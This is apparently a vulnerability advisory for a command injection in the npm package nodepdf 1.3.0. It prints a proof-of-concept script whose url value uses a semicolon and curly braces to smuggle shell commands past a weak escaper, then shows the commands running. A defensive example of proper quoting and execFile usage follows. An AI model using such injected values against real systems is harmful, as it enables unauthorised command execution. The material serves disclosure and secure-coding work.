CVE-2016-4991: Command injection in NodePDF
Input passed to the Pdf() function is shell-escaped and passed to child_process.exec() during PDF rendering. However, the shell escape does not properly encode all special characters, namely the semicolon and curly braces. This can be abused to achieve command execution. This problem affects nodepdf 1.3.0.
Software: nodepdf
Website: https://github.com/TJkrusinski/NodePDF
This vulnerability was later fixed in the shell-escape library and assigned the identifier CVE-2016-10541.
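// render.js: reproduction case from the advisory
var nodepdf = require('nodepdf');
// The url value contains the semicolon and curly braces that the shell escape leaves unencoded
var url = ";{echo,hello,world};w";
var filename = "output.pdf";
var pdf = new nodepdf(url, filename, {});
// Print whatever the child process writes to stdout and stderr
pdf.on('stdout', console.log);
pdf.on('stderr', console.error);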
$ npm install nodepdf@1.3.0
$ node render.js
11 incorrect args
hello world
03:31:25 up 19 days, 16 min, 1 user, load average: 0.15, 0.15, 0.10
USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT
user pts/0 192.168.1.64 02:38 0.00s 0.31s 0.00s w
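The incomplete escaping described above can be checked for, and avoided, as in the following added example, which is not code from NodePDF or the shell-escape library. weakEscape is a constructed stand-in for a blacklist escaper that omits the semicolon and curly braces; posixQuote, activeMetachars and passAsArgv are hypothetical helper names.

```javascript
// Added example, not NodePDF or shell-escape code. All function names are hypothetical.
const { execFileSync } = require('child_process');

// Constructed blacklist escaper: backslash-escapes some metacharacters,
// but has no entry for ';', '{' or '}'.
function weakEscape(arg) {
  return arg.replace(/([\s"'$`\\|&<>()])/g, '\\$1');
}

// POSIX single-quote quoting: everything inside '...' is literal; an embedded
// single quote is written as '\'' (close, escaped quote, reopen).
function posixQuote(arg) {
  return "'" + arg.replace(/'/g, "'\\''") + "'";
}

// Regression check for an escaper: list the shell metacharacters that are
// still active (not backslash-escaped, not inside single quotes) in a string
// destined for `sh -c`. Double quotes are conservatively reported as active.
function activeMetachars(cmd) {
  const found = [];
  let inSingle = false;
  for (let i = 0; i < cmd.length; i++) {
    const c = cmd[i];
    if (inSingle) { if (c === "'") inSingle = false; continue; }
    if (c === "'") { inSingle = true; continue; }
    if (c === '\\') { i++; continue; } // the next character is escaped
    if (';{}|&<>()$`"'.includes(c)) found.push(c);
  }
  return found;
}

// Preferred fix: no shell at all. execFile passes each array element as one
// argv entry, so the value reaches the child unchanged. The child here is
// node itself, echoing its first argument back as JSON.
function passAsArgv(value) {
  const out = execFileSync(process.execPath,
    ['-e', 'process.stdout.write(JSON.stringify(process.argv[1]))', value]);
  return JSON.parse(out.toString());
}

const input = ';{echo,hello,world};w'; // the url string from the advisory's example
console.log('weak escape leaves active:', activeMetachars(weakEscape(input)));
console.log('single-quoted leaves active:', activeMetachars(posixQuote(input)));
console.log('argv round trip intact:', passAsArgv(input) === input);
```

Running activeMetachars over an escaper's output for a corpus of hostile strings makes a useful unit test; passing arguments as an array to execFile or spawn removes the need for escaping in the first place.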
Related news
The npm module "shell-quote" 1.6.0 and earlier cannot correctly escape ">" and "<" operator used for redirection in shell. Applications that depend on shell-quote may also be vulnerable. A malicious user could perform code injection.